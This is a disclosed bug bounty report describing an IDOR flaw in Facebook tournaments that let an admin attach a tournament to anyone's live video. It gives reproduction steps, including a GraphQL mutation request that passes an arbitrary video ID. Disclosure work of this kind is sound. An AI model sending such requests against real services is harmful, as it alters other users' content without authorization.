Published On: 05 Feb 2022
Attacker could attach their own tournamnet to any live video.
IDOR
Facebook | Web
---
HIGH VALIDDescription
Tournament participants or admins can attach their live videos with tournaments in which they are participating, from these videos event admins can choose video as the primary tournament video. While doing so a malicious tournament admin can choose any live video on Facebook and this will automatically link the live video with the tournament.
Impact
A malicious user could attach their own tournament into any live video. Once the live video has ended by the owner, there will be a prompt saying that 'Playing in tournament : TournamentOne'
Reproduction Steps
Step
1
FBDL run
Script:
[setup]
User UserOne
User UserTwo
User UserThree
Event EventOne with {owner: UserOne, place: UserOne, show_guest_list:false}
[action]
UserOne create_tournament TournamentOne with {event: EventOne}
Results:
UserOne => 100072051960992
UserTwo => 100071719178311
UserThree => 100072022111868
EventOne => 177488881019368
TournamentOne => 174561821413310
Step
2
Users:
1. UserOne
2. UserTwo
3. UserThree
Environment:
1. EventOne : Admin : UserOne
2. TournamentOne : Linked with EventOne
Step
3
1. Login as UserOne
2. Browse TournamentOne/ Participants/ Add two participants
3. Brackets/Start tournament/
4. View page source code and copy arena_id
Step
4
4. Login as UserTwo using FB4A
5. Go live ( Privacy : Public) LiveOne
Step
5
6. interacting as UserOne, Get access token for Facebook for Android
POST /api/graphql/
variables={"input":{"client_mutation_id":"4","actor_id":"USER_ID","arena_id":"ARENA_ID","video_id":"LIVEONE_VIDEO_ID"},"scale":1}
doc_id=4001333603328687
Step
6
7. Now interacting as UserTwo end the live video
Step
7
8. Login as UserThree ( Desktop version)and play LiveOne
There will be a prompt saying UserTwo is playing in TournamentOne.